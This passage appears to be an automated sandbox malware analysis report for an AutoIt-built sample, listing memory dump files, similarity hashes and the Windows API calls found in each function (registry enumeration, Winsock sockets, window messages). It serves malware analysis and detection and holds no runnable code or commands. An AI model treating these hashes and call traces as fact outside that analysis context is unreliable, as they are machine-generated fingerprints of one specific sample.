                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                      • API String ID: 338900592-2727554177
                                                                                                                                                                                                                                      • Opcode ID: a3c22168d741ccc1f1de1f8812e7d25f57bf45481f5e46515992ed3ae7a68141
                                                                                                                                                                                                                                      • Instruction ID: 211553c0bdd114b4414f942eda2839fe86f24c082a674a9e8fce6ee5c05424f1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a3c22168d741ccc1f1de1f8812e7d25f57bf45481f5e46515992ed3ae7a68141
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FA71A1715083049EC300EF65EC419ABBBE9FF99360F40642EF445A71A0DF70DA48DB52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000EB), ref: 00E662B7
                                                                                                                                                                                                                                        • Part of subcall function 00E66347: GetClientRect.USER32(?,?), ref: 00E6636D
                                                                                                                                                                                                                                        • Part of subcall function 00E66347: GetWindowRect.USER32(?,?), ref: 00E663AE
                                                                                                                                                                                                                                        • Part of subcall function 00E66347: ScreenToClient.USER32(?,?), ref: 00E663D6
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 00EA5010
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EA5023
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 00EA5031
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000,?,00000031,00000000,00000000), ref: 00EA5046
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000,?,00000031,00000000,00000000), ref: 00EA504E
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EA50DF
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                                                                                                                                                                      • String ID: U
                                                                                                                                                                                                                                      • API String ID: 4009187628-3372436214
                                                                                                                                                                                                                                      • Opcode ID: 362aff48b5ee54aeade1c17e4fb2a563da433fde6b4fbecd22a52f859b3dc480
                                                                                                                                                                                                                                      • Instruction ID: c9aa5f9548c77424a92c6419fb69ba40c49c21154ee08a0c388acf7ad0a5848a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 362aff48b5ee54aeade1c17e4fb2a563da433fde6b4fbecd22a52f859b3dc480
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4271CF32500609DFCF218F64CC84AFA3BB5FF8A368F146669ED557E1A6D731A840DB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00E6636D
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E663AE
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00E663D6
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00E6651A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E6653B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1296646539-0
                                                                                                                                                                                                                                      • Opcode ID: e6e2d5b53bc6d2fa53626a076de14796dce4de21a407c7c089030a4f32a0dbd4
                                                                                                                                                                                                                                      • Instruction ID: dea0741c99d2a86f938583cdc07d1d161eef56cfadb124132f9627b9b9b332b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6e2d5b53bc6d2fa53626a076de14796dce4de21a407c7c089030a4f32a0dbd4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C1583591065AEFDB10CFA8D880BEDBBB1FF58314F14A41AE8A5F7250DB34A950DB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010,?,?,SysListView32,00EFDCD0,00000000,?,?,?,?,?,?,00000000), ref: 00EF418A
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001036,00000000,?,?,?,SysListView32,00EFDCD0,00000000,?,?,?,?,?,?,00000000), ref: 00EF419F
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00EF41B9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001057,00000000,?,?,?,00F328C4), ref: 00EF422B
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00EF4259
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                      • String ID: SysListView32
                                                                                                                                                                                                                                      • API String ID: 2326795674-78025650
                                                                                                                                                                                                                                      • Opcode ID: 2c9b39aae13efe1de88cc68a236042bf433cd45925d6418cbe0a8107820e84d9
                                                                                                                                                                                                                                      • Instruction ID: 7b662ff08c268902507d67c82c77a42662e6db6f258c2ec77a12df41b2ca2d2b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2c9b39aae13efe1de88cc68a236042bf433cd45925d6418cbe0a8107820e84d9
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EA418FB1A0021DABEB119FA4CC49BFB7BA9EB58354F101526FA58F72D1D7709980CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00ECE133
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00ECE13A
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00ECE150
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000), ref: 00ECE157
                                                                                                                                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00ECE19B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00ECE178
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                      • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                      • Opcode ID: b73ae6dd8dc1ee1515d6d16f0cd7cf50a5b7aaae4b8819528d3a68e4010733a3
                                                                                                                                                                                                                                      • Instruction ID: eb2d7f616a7a4e7d68ae6151a838197b2eafd4c9d917830a423f16f83d22a4d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b73ae6dd8dc1ee1515d6d16f0cd7cf50a5b7aaae4b8819528d3a68e4010733a3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9D016DF6904308BFE710ABA49D89FFA7B6CDB48304F0145A5B706F2041EA749E898B71
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000,?,?,?,00E6173F), ref: 00E621C9
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000,?,?,?,00E6173F), ref: 00E621D1
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000,?,?,?,00E6173F), ref: 00E621DC
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,00E6173F), ref: 00E621E7
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000,?,?,?,00E6173F), ref: 00E621EF
                                                                                                                                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000,?,?,?,00E6173F), ref: 00E621F7
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Virtual
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4278518827-0
                                                                                                                                                                                                                                      • Opcode ID: bfbd286327145766da2f912b62ad00ac8a64d32df69a3501772e47c383a1f638
                                                                                                                                                                                                                                      • Instruction ID: 8d31b8bb7aaff9221fe49a3996bd269691078fc684edbb64a28bd535a2f945bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bfbd286327145766da2f912b62ad00ac8a64d32df69a3501772e47c383a1f638
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36016CB09017597DE3008F5A8C85B52FFA8FF59354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • #8.OLEAUT32(?,00EFDCD0), ref: 00EE41C4
                                                                                                                                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00EE42D3
                                                                                                                                                                                                                                      • #9.WSOCK32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00EE4478
                                                                                                                                                                                                                                        • Part of subcall function 00ED14A9: #8.OLEAUT32(00000000,?,?,?,?,?,00EE5357,?,?), ref: 00ED14E9
                                                                                                                                                                                                                                        • Part of subcall function 00ED14A9: #10.WSOCK32(?,?,?,00EE5357,?,?), ref: 00ED14F2
                                                                                                                                                                                                                                        • Part of subcall function 00ED14A9: #9.WSOCK32(?,?,00EE5357,?,?), ref: 00ED14FE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharUpper
                                                                                                                                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                      • API String ID: 3964851224-1221869570
                                                                                                                                                                                                                                      • Opcode ID: 1a7bae9cadd2bdd9cfc2862e1306973835f6fc972637dc66e64cbe7cc50be7cc
                                                                                                                                                                                                                                      • Instruction ID: 47e47ac49e94627024b8a35d46a91a660abb106045a6bdba0da2a694a103fa4d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7bae9cadd2bdd9cfc2862e1306973835f6fc972637dc66e64cbe7cc50be7cc
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A491ABB56083459FC700EF65D48096AB7E5FF88318F14992DF899A7391DB31ED0ACB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EED1F1: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EEBF07,?,?), ref: 00EED20E
                                                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EEC2FE
                                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EEC359
                                                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00EEC3BC
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00EEC3FF
                                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00EEC40C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3740051246-0
                                                                                                                                                                                                                                      • Opcode ID: 4cce6dc953fd399a5115e8690b6d16eb4d678f7bedc1096d3789d0bb763d8909
                                                                                                                                                                                                                                      • Instruction ID: 35cc7ca4f8d4f3b814d7f40bf1efabdc42b70478f01c77d9312587d4d63a097e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4cce6dc953fd399a5115e8690b6d16eb4d678f7bedc1096d3789d0bb763d8909
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3861D631208245EFC714DF15C890E6ABBE5FF84348F14959DF096AB2A2CB31ED46CB92
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EE38A7: #10.WSOCK32(?,?,?,?,?,00000000), ref: 00EE38D3
                                                                                                                                                                                                                                      • #23.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EE20B6
                                                                                                                                                                                                                                      • #111.WSOCK32 ref: 00EE20DD
                                                                                                                                                                                                                                      • #2.WSOCK32(00000000,?,00000010), ref: 00EE2134
                                                                                                                                                                                                                                      • #111.WSOCK32 ref: 00EE213F
                                                                                                                                                                                                                                      • #3.WSOCK32(00000000), ref: 00EE216E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: #111
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 568940515-0
                                                                                                                                                                                                                                      • Opcode ID: d061e916afbfc0fa28f2ac1fb4a0defe20b51bbcfed2a8f5102110b3e0296154
                                                                                                                                                                                                                                      • Instruction ID: e9287537b24fc267d678eeecceb56f967d3d50283f45d73df089cfa47dfeafe4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d061e916afbfc0fa28f2ac1fb4a0defe20b51bbcfed2a8f5102110b3e0296154
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8451E170A40204AFD710AF25D886F2A77E9AF44358F18848CFA49BF3C3D671AD41CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetInputState.USER32 ref: 00ED411B
                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00ED4172
                                                                                                                                                                                                                                      • TranslateMessage.USER32(?,?), ref: 00ED419B
                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 00ED41A5
                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00ED41B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2256411358-0
                                                                                                                                                                                                                                      • Opcode ID: 23866eecd9364c0df4154f0cd3d7dc7f28e855c365f6dbcd3033dbac9f03f3e5
                                                                                                                                                                                                                                      • Instruction ID: fc87d8c8e17655d159dc0156322045e51036153108a7020a4de29df038bf17fd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23866eecd9364c0df4154f0cd3d7dc7f28e855c365f6dbcd3033dbac9f03f3e5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4131B3F0505345DFEB24DB649C49BB63BE9EB30318F04156BE462E62E0E774948BDB21
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00EC62F6
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EC630D
                                                                                                                                                                                                                                      • MessageBeep.USER32(00000000), ref: 00EC6325
                                                                                                                                                                                                                                      • KillTimer.USER32(?,0000040A), ref: 00EC6341
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001,?), ref: 00EC635B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000013.00000002.42568483488.0000000000E61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42568457636.0000000000E60000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569245926.0000000000EFD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569429921.0000000000F23000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569503861.0000000000F2D000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569527408.0000000000F31000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000013.00000002.42569550795.0000000000F35000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_19_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3741023627-0
                                                                                                                                                                                                                                      • Opcode ID: 846a8ba59f031726f5a31d55a8a1ed2efe425007091d8554bdf7bde588ab2392
                                                                                                                                                                                                                                      • Instruction ID: 97c350a1c856577a990a60a3f58172cb39c179ef4cbbc529a117951c709d3b48
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 846a8ba59f031726f5a31d55a8a1ed2efe425007091d8554bdf7bde588ab2392
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C018170504704ABEB215B29DE4EFA67BB9FB80B05F00155DF586B10E1DBF1A949CA90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00E6462F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E64609,?,?,00EA3BD6,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E6464F
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00ED61E5
